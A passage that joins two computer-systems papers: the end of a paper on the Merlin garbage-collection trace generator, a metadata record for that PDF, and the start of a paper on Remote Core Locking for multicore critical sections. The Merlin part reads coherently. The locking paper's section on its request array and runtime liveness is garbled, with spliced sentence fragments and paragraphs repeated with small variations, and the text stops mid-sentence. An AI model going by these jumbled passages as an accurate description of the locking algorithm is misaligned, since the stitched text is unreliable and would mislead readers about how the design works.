process by noting that each of these object’s last reachable time is the latest last reachable time of an object containing the former in its transitive closure set. 6.2.3 Computing When Objects Become Unreachable Because the Merlin algorithm is concerned with when an object was last reachable and cannot always determine how the object became unreachable, the issue is to find a single method that computes every object’s last reachable time. The methods from Figures 4 and 5 timestamp the correct last reachable time for those objects that are last reachable as described in Scenarios 1 and 2 of Table 5. By combining the two timestamping methods with computing last reachable times by membership in transitive closure sets, Merlin can determine the last reachable time of every object. To demonstrate that this combined method works, we consider each scenario from Table 5. Since no object continues to point to an object last reachable as described by Scenario 1 of Table 5 after it is last reachable, the latter object will only be a member of its own transitive closure set. Therefore, the last reachable time Merlin computes will be the object’s own timestamp. The last reachable time computed for an object that is last reachable as in Scenario 2 of Table 5 will also be the time with which it is stamped. This object was last reachable when its timestamp was last updated. Since any objects that point to it must be unreachable, the pointing objects could not have later last reachable times. Thus, the transitive closure computation will determine the object was last reachable at the time with which it is already stamped. We show above that this combined method computes last reachable times for objects that are last reachable as in Scenario 3 of Table 5, so Merlin can compute last reachable times by combining timestamping and computing the transitive closures and need not know how each object transitioned from reachable to unreachable. 6.2.4 Computing Death Times Efficiently Computing the full transitive closure sets is a time consuming process, requiring \(O(n^2)\) time. But finding an object’s last reachable time requires knowing only the latest object containing the former object in its transitive closure set. Rather than formally computing the transitive closure sets, Merlin performs a depth-first search from each object, propagating the last reachable time forward to the objects visited in the search. To save time, Merlin begins by ordering the objects from the earliest timestamp to the latest and then pushing them onto the search stack so the latest object will be popped first. Figure 3(a) shows this initialization. Upon removing an object from the stack, the Merlin algorithm analyzes its fields to find pointers to other objects. If a pointed-to object could be unreachable and is stamped with an earlier time than the referring object, then the pointed-to object is stamped with this later time. If the object is definitely unreachable, it is pushed onto the stack after its timestamp is updated (e.g., Figure 3(b) and 3(c)). If a pointed-to object’s time is equal to that of the referring object, then either we have found a cycle (e.g., Figure 3(c)) or the pointed-to object is already on the stack to propagate this time. Either way, the pointed-to object does not need to be pushed on the stack. If a pointed-to object’s time is later, then the object remained reachable after the time being propagated and this possible last reachable time is unimportant. Pushing objects onto the stack from the earliest timestamp time to the latest means each object is processed only once. The search proceeds from the latest timestamp to the earliest; later examinations of an object are computing earlier last reachable times. This method of finding last reachable times requires only \(O(n \log n)\) time, the sorting of the objects being the limiting factor. Figure 6 shows the code the Merlin algorithm uses for this modified depth-first search. 6.3 The Merlin Trace Generator As described so far, Merlin is able to reconstruct when objects were last reachable. However, it is unable to determine which objects are no longer reachable: it still needs a reachability analysis. The Merlin algorithm uses two simple solutions to overcome this. Whenever possible, it delays computation until immediately after garbage collection. Before any memory is cleared, the trace generation algorithm has access to objects within the heap and the garbage collector’s reachability analysis. This piggy-backing saves a lot of duplicative analysis. At other times (e.g., when a program terminates), garbage collection may not be invoked but the algorithm needs a reachability analysis. We first stamp the root-referenced objects with the current time and then compute the last reachable times of every object in the heap. Objects with a last reachable time equal to the current time must be reachable from the program roots and therefore are still alive. All other objects are unreachable and their death records are added to the trace. This method of finding unreachable objects enables the Merlin algorithm to work with any garbage collector. Even if the garbage collector cannot guarantee that it will collect all unreachable objects, when the program terminates Merlin performs the combined object reachability / last reachable time analysis to find the unreachable objects and their last reachable times. As stated in Section 2.1, we rely upon a couple of assumptions about the host GC. First, that any unreachable object the GC is treating as live will have the objects it points to treated as live, as is required among many GC algorithms. Thus no object is removed from the heap until all objects pointing to it are removed. Second, the Merlin algorithm assumes that there are no pointer stores involving an unreachable object. Therefore, we assume that once an object becomes unreachable, its incoming and outgoing references are constant. Both of these preconditions are important for our transitive closure computation, and languages such as Java and Smalltalk satisfy them. The order in which the Merlin trace generator adds information to the trace is an issue. As discussed in Section 6.2, our trace generator needs the concept of time to determine where in the trace each object death record should be placed. The object death records either must be added to the trace in chronological order before writing the trace to disk, or can be appended to the trace with a post-processing step placing the trace into proper order. Holding all the trace records in memory until an object death is found is a difficult challenge; with larger traces holding these records can require significant amounts of memory. Our implementation of the Merlin algorithm uses an external post-processing step that sorts and integrates the object death records. Either way of handling this issue has advantages and disadvantages, but adds very little time to trace generation. 6.4 Object Allocations and Pointer Updates Trace generation is already efficient at finding and reporting object allocations and pointer updates. As discussed in Section 2.3, even the brute force method of trace generation can find and record these actions in linear time. Our new algorithm, like those before it, instruments the host system’s memory manager to determine when memory is allocated for new objects. At those times, Merlin records the ongoing object allocation. Finding and reporting pointer updates also does not change. Like brute force trace generation, the Merlin algorithm instruments the heap pointer store operations (preferably by augmenting existing write barriers). Our new trace generation algorithm does add an additional requirement, the reasons for which are explained in Section 6.2.2. Unlike brute force, our trace generator requires access to the object being updated, the new value of the pointer, and the old value of the pointer. As many write barriers are already implemented to access these values (e.g., a write barrier capable of reference counting), this additional requirement is not a hardship. Allowing our trace generator to work with almost any garbage collector (rather than requiring a semi-space collector) makes the instrumentation to record pointer updates easier to add. While a semi-space collector does not require a write barrier, many algorithms (e.g., generational and OF collectors) do. Moreover, specific languages/systems require a write barrier for their own reasons. Combining our trace generator with these algorithms allows the use of the existing write barriers, enabling the Merlin trace generator to leverage this code. 7. EVALUATION OF MERLIN We implemented both Merlin and the brute force trace algorithm within the Jikes virtual machine. We then performed some initial timing runs on a Macintosh Power Mac G4, with two 533 MHz processors, 32KB on-chip L1 data and instruction caches, 256KB... Figure 3: Computing object death times, where $t_i < t_i+1$. Since Object D doesn’t have any incoming references, Merlin’s computation cannot change its timestamp. Although Object A was last reachable at its timestamp, care is needed so that the last reachable time does not change via processing its incoming reference. In (a), Object A is processed finding the pointer to Object B. Object B’s timestamp is earlier, so Object B is added to the stack and last reachable time set. We process Object B and find the pointer to Object C in (b). Object C has an earlier timestamp, so it is added to the stack and timestamp updated. In (c), Object C is processed. Object A is pointed to, but it does not have an earlier timestamp and is not added to the stack. After (c), the cycle has finished being processed. The remaining objects in the stack will be examined, but no further processing is needed. ```c void PointerStoreInstrumentation(ADDRESS source, ADDRESS newTarget) ADDRESS oldTarget = getMemoryWord(source); if (oldTarget != null) oldTarget.timeStamp = currentTime; addToTrace(pointerUpdate, source, newTarget); ``` Figure 4: Code for Merlin’s pointer store instrumentation ```c void ProcessRootPointer(ADDRESS rootAddr) ADDRESS rootTarget = getMemoryWord(rootAddr); if (rootTarget != null) rootTarget.timeStamp = currentTime; ``` Figure 5: Code for Merlin’s root pointer processing ```c void ComputeObjectDeathTimes() Time lastTime = ∞ sort unreachable objects from the earliest timestamp to the latest; push each unreachable object onto a stack from the earliest timestamp to the latest; while (!stack.empty()) Object obj = stack.pop(); Time objTime = obj.timeStamp; if (objTime <= lastTime) lastTime = objTime; for each (field in obj) if (isPointer(field) && field != null) Object target = getMemoryWord(field); Time targetTime = target.timeStamp; if (isUnreachable(target) && targetTime < lastTime) target.timeStamp = lastTime; stack.push(target); ``` Figure 6: Code of Merlin trace generation last reachable time computation Figure 7: The speedup of Merlin versus Brute Force trace generation. Note the log-log scale. unified L2 cache, 1MB L3 off-chip cache and 384MB of memory, running PPC Linux 2.4.3. We used only one processor for our experiments, which were run in single-user mode with the network card disabled. We built two versions of the VM, one for each of the algorithms. Whenever possible we used identical code for the two JVMs, so Merlin is implemented with a semi-space collector. Merlin’s running time is spent largely in performing the modified root scan that is required at every accurate point in the trace. We further improved Merlin’s running time by including a number of optimizations that minimize the number of root pointers that must be enumerated at each of these locations. The first optimization was to instrument pointer store operations involving static (global) pointers. With this instrumentation Merlin does not need to enumerate the static pointers at each accurate point, as the instrumentation marks objects whenever they lose an incoming reference from the static fields. Because Java allows functions to access only their own stack frame, repeated scanning within the same method always enumerates the same objects from the pointers below this method’s frame. We implemented a stack barrier that is called when frames are popped off the stack, enabling Merlin to scan the stack less deep and further reduce the time needed for Merlin tracing [6]. Because they would not improve brute-force tracing, these optimizations were used only with Merlin tracing. We generated traces at different granularities across a small range of programs. Because of the time required for brute force trace generation, we limited some traces to only the initial few megabytes of data allocation. Working with common benchmarks and generating traces of identical granularity, Merlin achieved speedup factors of up to 816. In the time that brute force needed to generate traces with 16 to 1024KB of granularity, Merlin generated perfect traces. Figure 7 shows the speedup Merlin, generating perfect traces, achieves over the brute force algorithm generating traces at different levels of granularity. Clearly, Merlin can greatly reduce the time needed to generate a trace. However, as seen in Figure 7, the speedup is less as granularity increases. The time required depends on the time needed to generate object death records and, therefore, on trace granularity. Brute force limits object death processing to only when the trace must be accurate; as the granularity increases the time needed greatly diminishes. While Merlin needs to perform only periodic collections, it also must perform a small set of actions at each pointer update and location in the trace with perfect knowledge. Even with brute force performing more frequent GCs, the cost of Merlin’s frequent root enumerations and updating timestamps becomes too great. These results are promising, but we can speed up performance of the Merlin tracing algorithm even more. As a program’s memory footprint grows, and as more accurate points are needed, the Merlin algorithm is far less affected than brute force. 8. RELATED WORK We do not know of any previous research into the effects of trace granularity or different methods of generating garbage collection traces. In this section, we discuss the research from which this study draws its roots. Using Knowledge of the Future: Belady’s [4] optimal virtual memory page replacement policy, MIN, decided which blocks should not be paged to disk by analyzing future events. At each decision point, the MIN algorithm considers future memory accesses, stored within an available file, until it determines the single block to evict. Because the algorithm did not cache results, at each decision point the MIN algorithm begins a new analysis. While Belady’s algorithm used knowledge of future events to perform optimally, it processes events in chronological order. Each time it is invoked, the MIN algorithm looks only far enough into the future as is necessary to make the current decision. Cyclic Reference Counting: One of the earliest methods of garbage collection was to use reference counts: each object has a count of its incoming references so, when the count reaches 0, the object can be freed [8]. McBeth was the first to appreciate that this approach cannot collect cycles of objects, since the reference counts would never reach zero [9]. Many different schemes have been developed to deal with cycles. Trial deletions [17] collects cycles of objects by removing a pointer thought to be within a cycle. After removing the pointer, trial deletion updates the reference counts. If, in updating the reference counts, the source object for the removed pointer is found unreachable, then a cycle exists and the objects are dead. Otherwise a dead cycle may not exist, the deleted pointer is reestablished and the original reference counts restored. This method can handle and detect cycles, but it may incorrectly guess that some objects are in a cycle and cannot take advantage of other object reachability analyses. Merlin does not perform any explicit reference counting, though it marks objects whenever they lose an incoming reference. Generally, reference counting methods cannot properly determine when cycles of objects become unreachable. While methods, like trial deletion, have been developed to avoid this problem, these methods cannot guarantee that they will determine when each object is unreachable in addition to processing each object only once. Using Merlin, as opposed to reference counting, allows both of these requirements to be met. Lifetime Approximation: To cope with the cost of producing GC traces, there has been previous research into approximating the lifetimes of objects. These approximations model the object allocation and object death behavior of actual programs. One paper described mathematical functions that model object lifetime characteristics based upon the actual lifetime characteristics of 58 Smalltalk and Java programs [14]. Zorn and Grunwald compare several different models one can use to approximate object allocation and object death records of actual programs [18]. Neither study attempted to generate actual traces, nor does either study consider the effects of pointed updates; rather, these studies attempted to find ways other than trace generation to produce input for memory management simulations. 9. SUMMARY The use of granulated traces for garbage collection simulation raises a number of issues. We first develop a method by which any variable that affects garbage collection simulations can be statistically tested. We then use this method to show that over a wide range of variables, granulated traces produce results that are significantly different from those produced by perfect traces. Additionally, we show that there are ways of simulating granulated traces that are better at minimizing these issues. With these results, we propose changing the trace format standard to include additional information. Finally, we introduce and describe the Merlin Trace Generation Algorithm. We show that the Merlin algorithm can produce traces more than 800 times as fast as the common brute force method of trace generation. By generating traces with Merlin, we can create perfect traces in less time than previously required for granulated traces. Thus, the Merlin algorithm makes trace generation quick and easy, and eliminates the need for granulated traces. Acknowledgments We would like to thank John N. Zigman for his work in developing gc-sim and also Aaron Cass for his help processing much of this data. 10. REFERENCES
{"Source-Url": "http://www.cs.unm.edu/~darko/papers/sigmetrics-2002-merlin.pdf", "len_cl100k_base": 12970, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 40055, "total-output-tokens": 14706, "length": "2e13", "weborganizer": {"__label__adult": 0.0003466606140136719, "__label__art_design": 0.0002760887145996094, "__label__crime_law": 0.0002918243408203125, "__label__education_jobs": 0.0004901885986328125, "__label__entertainment": 6.109476089477539e-05, "__label__fashion_beauty": 0.00015854835510253906, "__label__finance_business": 0.00021982192993164065, "__label__food_dining": 0.00029850006103515625, "__label__games": 0.0006809234619140625, "__label__hardware": 0.0016326904296875, "__label__health": 0.0004477500915527344, "__label__history": 0.0003039836883544922, "__label__home_hobbies": 0.00010323524475097656, "__label__industrial": 0.00035381317138671875, "__label__literature": 0.0002460479736328125, "__label__politics": 0.000240325927734375, "__label__religion": 0.0004444122314453125, "__label__science_tech": 0.024658203125, "__label__social_life": 7.104873657226562e-05, "__label__software": 0.005687713623046875, "__label__software_dev": 0.9619140625, "__label__sports_fitness": 0.0003306865692138672, "__label__transportation": 0.000560760498046875, "__label__travel": 0.0002130270004272461}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 65943, 0.03147]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 65943, 0.60106]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 65943, 0.90681]], "google_gemma-3-12b-it_contains_pii": [[0, 2382, false], [2382, 9628, null], [9628, 16303, null], [16303, 22278, null], [22278, 26544, null], [26544, 30822, null], [30822, 38013, null], [38013, 44596, null], [44596, 52028, null], [52028, 54236, null], [54236, 60568, null], [60568, 65943, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2382, true], [2382, 9628, null], [9628, 16303, null], [16303, 22278, null], [22278, 26544, null], [26544, 30822, null], [30822, 38013, null], [38013, 44596, null], [44596, 52028, null], [52028, 54236, null], [54236, 60568, null], [60568, 65943, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 65943, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 65943, null]], "pdf_page_numbers": [[0, 2382, 1], [2382, 9628, 2], [9628, 16303, 3], [16303, 22278, 4], [22278, 26544, 5], [26544, 30822, 6], [30822, 38013, 7], [38013, 44596, 8], [44596, 52028, 9], [52028, 54236, 10], [54236, 60568, 11], [60568, 65943, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 65943, 0.12791]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
21a8097a93bce37febf7b33387fb7311ebfc4dcb
Remote Core Locking: Migrating Critical-Section Execution to Improve the Performance of Multithreaded Applications Jean-Pierre Lozi Florian David Gaël Thomas Julia Lawall Gilles Muller LIP6/INRIA firstname.lastname@lip6.fr Abstract The scalability of multithreaded applications on current multicore systems is hampered by the performance of lock algorithms, due to the costs of access contention and cache misses. In this paper, we propose a new lock algorithm, Remote Core Locking (RCL), that aims to improve the performance of critical sections in legacy applications on multicore architectures. The idea of RCL is to replace lock acquisitions by optimized remote procedure calls to a dedicated server core. RCL limits the performance collapse observed with other lock algorithms when many threads try to acquire a lock concurrently and removes the need to transfer lock-protected shared data to the core acquiring the lock because such data can typically remain in the server core’s cache. We have developed a profiler that identifies the locks that are the bottlenecks in multithreaded applications and that can thus benefit from RCL, and a reengineering tool that transforms POSIX locks into RCL locks. We have evaluated our approach on 18 applications: Memcached, Berkeley DB, the 9 applications of the SPLASH-2 benchmark suite and the 7 applications of the Phoenix2 benchmark suite. 10 of these applications, including Memcached and Berkeley DB, are unable to scale because of locks, and benefit from RCL. Using RCL locks, we get performance improvements of up to 2.6 times with respect to POSIX locks on Memcached, and up to 14 times with respect to Berkeley DB. 1 Introduction Over the last twenty years, a number of studies [2, 3, 5, 12, 13, 15, 17, 24, 26, 27] have attempted to optimize the execution of critical sections on multicore architectures, either by reducing access contention or by improving cache locality. Access contention occurs when many threads simultaneously try to enter critical sections that are protected by the same lock, causing the cache line containing the lock to bounce between cores. Cache locality becomes a problem when a critical section accesses shared data that has recently been accessed on another core, resulting in cache misses, which greatly increase the critical section’s execution time. Addressing access contention and cache locality together remains a challenge. These issues imply that some applications that work well on a small number of cores do not scale to the number of cores found in today’s multicore architectures. Recently, several approaches have been proposed to execute a succession of critical sections on a single server core to improve cache locality [13, 27]. Such approaches also incorporate a fast transfer of control from other client cores to the server, to reduce access contention. Suleman et al. [27] propose a hardware-based solution, evaluated in simulation, that introduces new instructions to perform the transfer of control, and uses a special fast core to execute critical sections. Hendler et al. [13] propose a software-only solution, Flat Combining, in which the server is an ordinary client thread, and the role of server is handed off between clients periodically. This approach, however, slows down the thread playing the role of server, incurs an overhead for the management of the server role, and drastically degrades performance at low contention. Furthermore, neither Suleman et al.’s algorithm nor Hendler et al.’s algorithm can accommodate threads that block within a critical section, which makes them unable to support widely used applications such as Memcached. In this paper, we propose a new locking technique, Remote Core Locking (RCL), that aims to improve the performance of legacy multithreaded applications on multicore hardware by executing remotely, on one or several dedicated servers, critical sections that access highly contended locks. Our approach is entirely implemented in software and targets commodity x86 multicore architectures. At the basis of our approach is the observation that most applications do not scale to the number of cores found in modern multicore architectures, and thus it is possible to dedicate the cores that do not contribute to improving the performance of the application to serving critical sections. Thus, it is not necessary to burden the application threads with the role of server, as done in Flat Combining. RCL also accommodates blocking within critical sections as well as nested critical sections. The design of RCL addresses both access contention and locality. Contention is solved by a fast transfer of control to a server, using a dedicated cache line for each client to achieve busy-wait synchronization with the server core. Locality is improved because shared data is likely to remain in the server core’s cache, allowing the server to access such data without incurring cache misses. In this, RCL is similar to Flat Combining, but has a much lower overall overhead. We propose a methodology along with a set of tools to facilitate the use of RCL in a legacy application. Because RCL serializes critical sections associated with locks managed by the same core, transforming all locks into RCLs on a smaller number of servers could induce false serialization. Therefore, the programmer must first decide which locks should be transformed into RCLs and on which core(s) to run the server(s). For this, we have designed a profiler to identify which locks are frequently used by the application and how much time is spent on locking. Based on this information, we propose a set of simple heuristics to help the programmer decide which locks must be transformed into RCLs. We also have designed an automatic reengineering tool for C programs to transform the code of critical sections so that it can be executed as a remote procedure call on the server core: the code within the critical sections must be extracted as functions and variables referenced or updated by the critical section that are declared by the function containing the critical section code must be sent as arguments, amounting to a context, to the server core. Finally, we have developed a runtime for Linux that is compatible with POSIX threads, and that supports a mixture of RCL and POSIX locks in a single application. RCL is well-suited to improve the performance of a legacy application in which contended locks are an obstacle to performance, since using RCL enables improving locality and resistance to contention without requiring a deep understanding of the source code. On the other hand, modifying locking schemes to use fine-grained locking or lock-free data structures is complex, requires an overhaul of the source code, and does not improve locality. We have evaluated the performance of RCL as compared to other locks on a custom latency microbenchmark measuring the execution time of critical sections that access a varying number of shared memory locations. Furthermore, based on the results of our profiler, we have identified Memcached, Berkeley DB with two types of TPC-C transactions, two benchmarks in the SPLASH-2 suite, and three benchmarks in the Phoenix2 suite as applications that could benefit from RCL. In each of these experiments, we compare RCL against the standard POSIX locks and the most efficient approaches for implementing locks of which we are aware: CAS spinlocks, MCS [17] and Flat Combining [13]. Comparisons are made for a same number of cores, which means that there are fewer application threads in the RCL case, since one or more cores are dedicated to RCL servers. On an Opteron 6172 48-core machine running a 3.0.0 Linux kernel with glibc 2.13, our main results are: - On our latency microbenchmark, under high contention, RCL is faster than all the other tested approaches, over 3 times faster than the second best approach, Flat Combining, and 4.4 faster than POSIX. - On our benchmarks, we found that contexts are small, and thus the need to pass a context to the server has only a marginal performance impact. - On most of our benchmarks, only one lock is frequently used and therefore only one RCL server is needed. The only exception is Berkeley DB which requires two RCL servers to prevent false serialization. - On Memcached, for Set requests, RCL provides a speedup of up to 2.6 times over POSIX locks, 2.0 times over MCS and 1.9 times over spinlocks. - For TPC-C Stock Level transactions, RCL provides a speedup of up to 14 times over the original Berkeley DB locks for 40 simultaneous clients and outperforms all other locks for more than 10 clients. Overall, RCL resists better when the number of simultaneous clients increases. The rest of the paper is structured as follows. Sec. 2 presents RCL and the use of profiling to automate the reengineering of a legacy application for use with RCL. Sec. 3 describes the RCL runtime. Sec. 4 presents the results of our evaluation. Sec. 5 presents other work that targets improving locking on multicore architectures. Finally, Sec. 6 concludes. 2 RCL Overview The key idea of RCL is to transfer the execution of a critical section to a server core that is dedicated to one or more locks (Fig. 1). To use this approach, it is necessary to choose the locks for which RCL is expected to be beneficial and to reengineer the critical sections associated with these locks as remote procedure calls. In this section, we first describe the core RCL algorithm, then present a profiling tool to help the developer choose which locks writes the address of the lock into the first word of the critical section, (ii) the address of a structure represented by the constant NULL for which the client requests execution, or updated by the critical section that are declared by the server. This array has size $L$ bytes, where $L$ is the size of the hardware cache line. Each request structure $req_i$ is $L$ bytes and allows communication between a specific client and the server. The array is aligned so that each structure $req_i$ is mapped to a single cache line. The first three machine words of each request $req_i$ contain respectively: (i) the address of the lock associated with the critical section, (ii) the address of a structure encapsulating the context, i.e., the variables referenced or updated by the critical section that are declared by the function containing the critical section code, and (iii) the address of a function that encapsulates the critical section for which the client $c_i$ has requested the execution, or NULL if no critical section is requested. Client side To execute a critical section, a client $c_i$ first writes the address of the lock into the first word of the structure $req_i$, then writes the address of the context structure into the second word, and finally writes the address of the function that encapsulates the code of the critical section into the third word. The client then actively waits for the third word of $req_i$ to be reset to NULL, indicating that the server has executed the critical section. In order to improve energy efficiency, if there are less clients than the number of cores available, the SSE3 `monitor/mwait` instructions can be used to avoid spinning: the client will sleep and be woken up automatically when the server writes into the third word of $req_i$. Server side A servicing thread iterates over the requests, waiting for one of the requests to contain a non-NULL value in its third word. When such a value is found, the servicing thread checks if the requested lock is free and, if so, acquires the lock and executes the critical section using the function pointer and the context. When the servicing thread is done executing the critical section, it resets the third word to NULL, and resumes the iteration. Fig. 1: Critical sections with POSIX locks vs. RCL. Fig. 2: The request array. Client $c_2$ has requested execution of the critical section implemented by $f_{oo}$. to implement using RCL and a reengineering tool that rewrites the associated critical sections. 2.1 Core algorithm Using RCL, a critical section is replaced by a remote procedure call to a procedure that executes the code of the critical section. To implement the remote procedure call, the clients and the server communicate through an array of request structures, specific to each server core (Fig. 2). This array has size $C \cdot L$ bytes, where $C$ is a constant representing the maximum number of allowed clients (a large number, typically much higher than the number of cores), and $L$ is the size of the hardware cache line. Each request structure $req_i$ is $L$ bytes and allows communication between a specific client $i$ and the server. The array is aligned so that each structure $req_i$ is mapped to a single cache line. The first three machine words of each request $req_i$ contain respectively: (i) the address of the lock associated with the critical section, (ii) the address of a structure encapsulating the context, i.e., the variables referenced or updated by the critical section that are declared by the function containing the critical section code, and (iii) the address of a function that encapsulates the critical section for which the client $c_i$ has requested the execution, or NULL if no critical section is requested. 2.2 Profiling To help the user decide which locks to transform into RCLs, we have designed a profiler that is implemented as a dynamically loaded library and intercepts calls involving POSIX locks, condition variables, and threads. The profiler returns information about the overall percentage of time spent in critical sections, as well as about the percentage of time spent in critical sections for each lock. We define the time spent in a critical section as the total time to acquire the lock (blocking time included), execute the critical section itself, and release the lock. It is measured by reading the cycle counter before and after each critical section, and by comparing the total measured time in critical sections with the total execution time, for each thread. The overall percentage of time spent in critical sections can help identify applications for which using RCL may be beneficial, and the percentage of time spent in critical sections for each lock helps guide the choice of which locks to transform into RCLs. For each lock, the profiler also produces information about the number of cache misses in its critical sections, as these may be reduced by the improved locality of RCL. Fig. 3 shows the profiling results for 18 applications, including Memcached v1.4.6 (an in-memory cache server), Berkeley DB v5.2.28 (a general-purpose database), the 9 applications of the SPLASH-2 benchmark suite (parallel scientific applications), and the 7 applications of the Phoenix v2.0.0 benchmark suite (MapReduce-based applications) with the “medium” dataset. Raytrace and Memcached are each tested with two different standard working sets, and Berkeley DB is tested with the 5 standard transaction types from TPC-C. A gray box indicates \textsuperscript{1}More information about these applications can be found at the following URLs: http://memcached.org (Memcached), http://www.oracle.com/technetwork/database/berkeleydb (Berkeley DB), http://www.capsl.udel.edu/splash (SPLASH-2) and http://mapreduce.stanford.edu (Phoenix2). that the application has not been run for the number of cores because even at 48 cores, locking is not a problem. Ten of the tests spend more than 20% of their time in critical sections and thus are candidates for RCL. Indeed, for these tests, the percentage of time spent in critical sections directly depends on the number of cores, indicating that the POSIX locks are one of the main bottlenecks of these applications. We see in Sec. 4.1 that if the percentage of time executing critical sections for a given lock is over 20%, then an RCL will perform better than a POSIX lock, and if it is over 70%, then an RCL will perform better than all other known lock algorithms. We also observe that the critical sections of Memcached/SET incur many cache misses. Finally, Berkeley DB uses hybrid Test-And-Set/POSIX locks, which causes the profiler to underestimate the time spent in critical sections. ### 2.3 Reengineering legacy applications If the results of the profiling show that some locks used by the application can benefit from RCL, the developer must reengineer all critical sections that may be protected by the selected locks as a separate function that can be passed to the lock server. This reengineering amounts to an “Extract Method” refactoring [10]. We have implemented this reengineering using the program transformation tool Coccinelle [21], in 2115 lines of code. It has a negligible impact on performance. The main problem in extracting a critical section into a separate function is to bind the variables needed by the critical section code. The extracted function must receive the values of variables that are initialized prior to the critical section and read within the critical section, and return the values of variables that are updated in the critical section and read afterwards. Only variables local to the function are concerned; alias analysis is not required because aliases involve addresses that can be referenced from the server. The values are passed to and from the server in an auxiliary structure, or directly in the client’s cache line in the request array (Fig. 2) if only one value is required. The reengineering also addresses a common case of fine-grained locking, illustrated in lines 5-9 of Fig. 4, where a conditional in the critical section releases the lock and returns from the function. In this case, the code is transformed such that the critical section returns a flag value indicating which unlock ends the critical section, and then the code following the remote procedure call executes the code following the unlock that is indicated by the flag value. Fig. 5 shows the complete result of transforming the code of Fig. 4. The transformation furthermore modifies various other lock manipulation functions to use the RCL runtime. In particular, the function for initializing a lock receives additional arguments indicating whether the lock should be implemented as an RCL. Finally, the reengineering tool also generates a header file, incorporating the profiling information, that the developer can edit to indicate which lock initializations should create POSIX locks and which ones should use RCLs. ### 3 Implementation of the RCL Runtime Legacy applications may use ad-hoc synchronization mechanisms and rely on libraries that themselves may block or spin. The core algorithm of Sec. 2.1, only refers to a single servicing thread, and thus requires that this thread is never blocked at the OS level and never spins in an active waitloop. In this section, we describe how the RCL runtime ensures liveness and responsiveness in these cases, and present implementation details. we have found that roughly half of the multithreaded applications that use POSIX locks in Debian 6.0.3 (October 2011) also use condition variables. Second, the servicing thread could spin if the critical section tries to acquire a spinlock or a nested RCL, or implements some form of ad hoc synchronization [20]. Finally, a thread could be preempted at the OS level when its timeslice expires [29]. ### Ensuring Liveness Three sorts of situations may induce liveness or responsiveness problems. First, the servicing thread could be blocked at the OS level, e.g., because a critical section tries to acquire a POSIX lock that is already held, performs an I/O, or waits on a condition variable. Indeed, we have found that roughly half of the multithreaded applications that use POSIX locks in Debian 6.0.3 (October 2011) also use condition variables. Second, the servicing thread could spin if the critical section tries to acquire a spinlock or a nested RCL, or implements some form of ad hoc synchronization [20]. Finally, a thread could be preempted at the OS level when its timeslice expires [29], or because of a page fault. Blocking and waiting within a critical section risk deadlock, because the server is unable to execute critical sections associated with other locks, even when doing so may be necessary to allow the blocked critical section to unblock. Additionally, blocking, of any form, including waiting and preemption, degrades the responsiveness of the server because a blocked thread is unable to serve other locks managed by the same server. ### Ensuring Liveness To ensure liveness, the RCL runtime manages a pool of threads on each server such that when a servicing thread blocks or waits there is always at least one other free servicing thread that is not currently executing a critical section and this servicing thread will eventually be elected. To ensure the existence of a free servicing thread, the RCL runtime provides a management thread, which is activated regularly at each expiration of a timeout (we use the Linux time-slice value) and runs at highest priority. When activated, the management thread checks that at least one of the servicing threads has made progress since its last activation, using a server-global flag is_alive that is set by the servicing threads. If it finds that this flag is still cleared when it wakes up, it assumes that all servicing threads are either blocked or waiting and adds a free thread to the pool of servicing threads. ### Ensuring Responsiveness The RCL runtime implements a number of strategies to improve responsiveness. First, it avoids thread preemption from the OS scheduler by using the POSIX FIFO scheduling policy, which allows a thread to execute until it blocks or yields the processor. Second, it tries to reduce the delay before an unblocked servicing thread is rescheduled by minimizing the number of servicing threads, thus minimizing the length of the FIFO queue. Accordingly, a servicing thread suspends when it observes that there is at least one other free servicing thread, i.e., one other thread able to handle requests. Third, to address the case where all servicing threads are blocked in the OS, the RCL runtime uses a backup thread, which has lower priority than all servicing threads, that simply clears the is_alive flag and wakes up the management thread. Finally, when a critical section needs to execute a nested RCL managed by the same core and the lock is already owned by another servicing thread, the servicing thread immediately yields, to allow the owner of the lock to release it. The use of the FIFO policy raises two further liveness issues. First, FIFO scheduling may induce a priority inversion between the backup thread and the servicing threads or between the servicing threads and the management. thread. To avoid this problem, the RCL runtime uses only lock-free algorithms and threads never wait on a resource. Second, if a servicing thread is in an active wait loop, it will not be preempted, and a free thread will not be elected. When the management thread detects no progress, i.e., is alive is false, it thus also acts as a scheduler, electing a servicing thread by first decrementing and then incrementing the priorities of all the servicing threads, effectively moving them to the end of the FIFO queue. This is expensive, but is only needed when a thread spins for a long time, which is a sign of poor programming, and is not triggered in our benchmarks. 3.2 Algorithm details We now describe in detail some issues of the algorithm. Serving RCLs Alg. 1 shows the code executed by a servicing thread. The fast path (lines 6-16) is the only code that is executed when there is only one servicing thread in the pool. A slow path (lines 17-24), is additionally executed when there are multiple servicing threads. Lines 9-15 of the fast path implement the RCL server loop as described in Sec. 2.1 and indicates that the servicing thread is not free by decrementing (line 8) and incrementing (line 16) number_of_freeThreads. Because the thread may be preempted due to a page fault, all operations on variables shared between the threads, including number_of_freeThreads, must be atomic. To avoid the need to reallocate the request array when new client threads are created, the size of the request array is fixed and chosen to be very large (256K), and the client identifier allocator implements an adaptive 